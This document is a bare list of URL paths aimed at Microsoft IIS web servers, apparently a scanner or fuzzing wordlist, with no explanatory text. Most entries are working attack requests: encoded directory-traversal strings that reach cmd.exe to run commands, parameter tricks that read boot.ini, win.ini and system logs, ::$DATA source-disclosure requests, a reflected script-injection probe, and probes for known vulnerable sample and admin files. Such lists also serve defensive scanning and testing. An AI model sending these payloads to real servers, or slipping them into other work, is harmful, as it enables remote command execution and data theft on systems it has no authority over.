/if/admin/nph-build.cgi?step=<script>alert("SecurityHole")</script>
/iforget.aspx
/ifx/
/iis/
/iisadmin
/iisadmin 
/iisadmin/
/iisadmin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/iisadmin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmin/..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c../winnt/system32/cmd.exe?/c+dir+c:%5c
/iisadmin/bdir.htr
/iisadmin/bdir.htr??c:\
/iisadmin/bdir.htr?dir=ht??c:\
/iisadmin/default.htm
/iisadmin/foobar.asp/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+c:%5c
/iisadmin/foobar.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+c:%5c
/iisadmin/iis.asp
/iisadmin/ism.dll
/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll?http/dir
/iisadmin/samples/ctgestb.htx
/iisadmin/samples/ctgestb.idc
/iisadmin/samples/details.htx
/iisadmin/samples/details.idc
/iisadmin/samples/query.htx
/iisadmin/samples/query.idc
/iisadmin/samples/register.htx
/iisadmin/samples/register.idc
/iisadmin/samples/sample.htx
/iisadmin/samples/sample.idc
/iisadmin/samples/sample2.htx
/iisadmin/samples/sample2.idc
/iisadmin/samples/viewbook.htx
/iisadmin/samples/viewbook.idc
/iisadmin/tools
/iisadmin/tools/ct.htx
/iisadmin/tools/ctss.idc
/iisadmin/tools/dsnform.exe
/iisadmin/tools/getdrvrs.exe
/iisadmin/tools/mkilog.exe
/iisadmin/tools/newdsn.exe
/iisadminbdir.htr
/IISADMPWD
/iisadmpwd/
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/iisadmpwd/..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/IISADMPWD/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot2.htr
/iisadmpwd/anot3.htr
/iisadmpwd/cmd.exe?/c+dir
/iisadmpwd/sensepost.exe?/c+dir
/iisamples/Sdk
/iisamples/Sdk 
/iishelp
/iishelp/
/iishelp/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/iishelp/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/iishelp/..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iishelp/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iishelp/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/iishelp/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/iishelp/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/iishelp/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/iishelp/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iishelp/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iishelp/..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c../winnt/system32/cmd.exe?/c+dir+c:%5c
/iishelp/common/colegal.htm
/iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
/iishelp/foobar.asp/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+c:%5c
/iishelp/foobar.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+c:%5c
/iishelp/iis
/iishelp/iis/misc
/iishelp/iis/misc/default.asp
/iishelp/iis/misc/iirturnh.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/IISHelp/iis/misc/Query.asp?SearchType=1
/iissamples 
/iissamples/
/iissamples/..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/iissamples/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iissamples/Default 
/iissamples/exair
/iissamples/ExAir 
/iissamples/Exair/Howitworks/Code.asp
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/howitworks/codebrws.asp?source=/msadc/../../../../../boot.ini
/iissamples/exair/howitworks/Winmsdp.exe
/iissamples/exair/search/advsearch.
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/advsearch.asp::$DATA
/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
/iissamples/exair/search/qsumrhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/iissamples/exair/search/query.asp
/iissamples/exair/Search/query.idq
/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/exair/search/search.asp
/iissamples/exair/Search/search.idq
/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/iissamples/query.asp
/iissamples/ISSamples 
/iissamples/issamples/codebrws.asp
/iissamples/issamples/fastq.idq
/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/ISSamples/oop
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/query.asp
/iissamples/issamples/query.asp::$DATA
/iissamples/issamples/query.idq
/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/issamples/sqlqhit.asp
/iissamples/issamples/sqlqhit.asp?CiColumns=*&CiScope=webinfo
/iissamples/issamples/Winmsdp.exe
/iissamples/query.asp
/iissamples/sdk/
/iissamples/sdk/asp/applications/Session_VBScript.asp
/iissamples/